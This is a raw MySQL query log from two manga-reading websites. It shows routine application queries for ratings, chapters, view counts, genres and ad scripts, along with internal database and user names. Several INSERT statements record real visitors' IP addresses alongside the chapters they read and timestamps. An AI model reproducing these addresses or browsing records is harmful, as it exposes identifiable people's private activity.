mangauser@localhost on u317079482_mangacherri_2 using Socket 330649459 Quit 330649460 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330649460 Quit 330649461 Quit 330649462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330649464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649463 Quit 330649464 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649462 Quit 330649464 Quit 330649465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330649465 Quit 330649466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330649466 Quit 330649467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330649467 Quit 330649468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330649468 Quit 330649469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330649469 Quit 330649470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330649470 Quit 330649471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330649471 Quit 330649472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330649472 Quit 330649473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330649473 Quit 330649474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330649474 Quit 330649475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330649475 Quit 330649476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330649476 Quit 330649477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330649477 Quit 330649478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330649478 Quit 330649479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330649479 Quit 330649480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330649480 Quit 330649481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330649481 Quit 330649482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330649482 Quit 330649483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330649483 Quit 330649484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330649484 Quit 330649485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330649485 Quit 330649486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330649486 Quit 330649487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330649487 Quit 330649488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330649488 Quit 330649489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330649489 Quit 330649490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330649490 Quit 330649491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330649491 Quit 330649492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330649492 Quit 330649493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330649493 Quit 330649494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330649494 Quit 330649495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330649495 Quit 330649496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330649496 Quit 330649497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330649497 Quit 330649498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330649498 Quit 330649499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330649499 Quit 330649500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330649500 Quit 330649501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330649501 Quit 330649502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330649502 Quit 330649503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330649503 Quit 330649504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330649504 Quit 330649505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330649505 Quit 330649506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330649506 Quit 330649507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330649507 Quit 330649508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330649508 Quit 330649509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649509 Quit 330649510 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5891' 330649510 Quit 330649511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649511 Query select * FROM chapters where id = '5891' 330649511 Quit 330649512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649512 Query select * FROM chapters where manga_id = '111' order by id desc 330649512 Quit 330649513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649513 Query Update chapters set view=view+1 where id = '5891' 330649513 Quit 330649514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649514 Query select * FROM chapters where id = '5891' 330649515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649514 Quit 330649515 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5891' 330649515 Quit 330649516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649516 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('111', '5891', '2804:14d:4ca6:834e:efb5:5349:c4c5:c6c2', 'mangacherri.com', '2026-02-26 03:28:58', '2026-02-26 03:28:58') 330649516 Quit 330649517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649517 Query select * FROM chapter_images where chapter_id = '5891' 330649517 Quit 330649518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649518 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '111' and m.active = 1 330649518 Quit 330649519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649519 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='111' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330649520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649520 Quit 330649521 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3115' 330649521 Quit 330649522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649522 Query select * FROM chapters where id = '3115' 330649522 Quit 330649523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649523 Query select * FROM chapters where manga_id = '77' order by id desc 330649523 Quit 330649524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649524 Query Update chapters set view=view+1 where id = '3115' 330649524 Quit 330649525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649525 Query select * FROM chapters where id = '3115' 330649525 Quit 330649526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649526 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3115' 330649526 Quit 330649527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649527 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('77', '3115', '102.214.84.34', 'mangacherri.com', '2026-02-26 03:28:58', '2026-02-26 03:28:58') 330649527 Quit 330649528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649528 Query select * FROM chapter_images where chapter_id = '3115' 330649528 Quit 330649529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649529 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '77' and m.active = 1 330649529 Quit 330649530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649530 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='77' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330649519 Quit 330649531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649531 Quit 330649532 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649532 Quit 330649533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649533 Quit 330649534 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649534 Quit 330649535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649535 Quit 330649536 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649536 Quit 330649537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649537 Quit 330649538 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649538 Quit 260225 19:28:59 330649530 Quit 330649539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649539 Quit 330649540 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649540 Quit 330649541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649541 Quit 330649542 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649542 Quit 330649543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649543 Quit 330649544 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649544 Quit 330649545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649545 Quit 330649546 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649546 Quit 330649547 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649548 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649547 Quit 330649548 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11998' and m.active = 1 330649548 Quit 330649549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649549 Query select * FROM chapters where id = '11998' 330649549 Quit 330649550 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649550 Query select * FROM chapters where manga_id = '208' order by display_priority ASC, id desc 330649550 Quit 330649551 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649551 Query Update chapters set view=view+1 where id = '11998' 330649551 Quit 330649552 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649552 Query select * FROM chapters where id = '11998' 330649553 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649552 Quit 330649553 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11998' and m.active = 1 330649553 Quit 330649554 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649554 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('208', '11998', '123.18.247.74', 'mangaberri.com', '2026-02-26 03:28:59', '2026-02-26 03:28:59') 330649554 Quit 330649555 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649555 Query select * FROM chapter_images where chapter_id = '11998' 330649555 Quit 330649556 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649556 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '208' and m.active = 1 330649556 Quit 330649557 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649557 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='208' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330649557 Quit 330649558 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649559 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649558 Quit 330649559 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649559 Quit 330649560 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649561 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649560 Quit 330649561 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649561 Quit 330649562 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649563 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649562 Quit 330649563 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649563 Quit 330649564 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649565 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649565 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649564 Quit 330649565 Quit 330649566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649566 Quit 330649567 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14402' 330649567 Quit 330649568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649568 Query select * FROM chapters where id = '14402' 330649568 Quit 330649569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649569 Query select * FROM chapters where manga_id = '277' order by id desc 330649569 Quit 330649570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649570 Query Update chapters set view=view+1 where id = '14402' 330649570 Quit 330649571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649571 Query select * FROM chapters where id = '14402' 330649571 Quit 330649572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649572 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14402' 330649572 Quit 330649573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649573 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('277', '14402', '119.234.67.84', 'mangacherri.com', '2026-02-26 03:28:59', '2026-02-26 03:28:59') 330649573 Quit 330649574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649574 Query select * FROM chapter_images where chapter_id = '14402' 330649574 Quit 330649575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649575 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '277' and m.active = 1 330649575 Quit 330649576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649576 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='277' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:00 330649576 Quit 330649577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649578 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649577 Quit 330649578 Quit 330649579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649579 Quit 330649580 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649580 Quit 330649581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649581 Quit 330649582 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649582 Quit 330649583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649584 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649583 Quit 330649584 Quit 330649585 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649586 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649585 Quit 330649586 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1753' and m.active = 1 330649586 Quit 330649587 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649587 Query select * FROM chapters where id = '1753' 330649587 Quit 330649588 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649588 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330649588 Quit 330649589 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649589 Query Update chapters set view=view+1 where id = '1753' 330649589 Quit 330649590 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649590 Query select * FROM chapters where id = '1753' 330649590 Quit 330649591 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649591 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1753' and m.active = 1 330649591 Quit 330649592 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649592 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '1753', '192.12.147.69', 'mangaberri.com', '2026-02-26 03:29:00', '2026-02-26 03:29:00') 330649592 Quit 330649593 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649593 Query select * FROM chapter_images where chapter_id = '1753' 330649593 Quit 330649594 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649594 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330649594 Quit 330649595 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649595 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330649595 Quit 330649596 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649597 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649596 Quit 330649597 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649597 Quit 330649598 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649599 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649598 Quit 330649599 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649599 Quit 330649600 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649601 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649600 Quit 330649601 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649601 Quit 330649602 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649603 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649602 Quit 330649603 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649603 Quit 330649604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649604 Quit 330649605 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17448' 330649605 Quit 330649606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649606 Query select * FROM chapters where id = '17448' 330649606 Quit 330649607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649607 Query select * FROM chapters where manga_id = '353' order by id desc 330649607 Quit 330649608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649608 Query Update chapters set view=view+1 where id = '17448' 330649608 Quit 330649609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649609 Query select * FROM chapters where id = '17448' 330649610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649609 Quit 330649610 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17448' 330649610 Quit 330649611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649611 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('353', '17448', '2001:16a2:4245:5000:4d2c:c440:240c:6eda', 'mangacherri.com', '2026-02-26 03:29:00', '2026-02-26 03:29:00') 330649611 Quit 330649612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649612 Query select * FROM chapter_images where chapter_id = '17448' 330649612 Quit 330649613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649613 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '353' and m.active = 1 330649613 Quit 330649614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649614 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='353' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Josei%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:01 330649614 Quit 330649615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649615 Quit 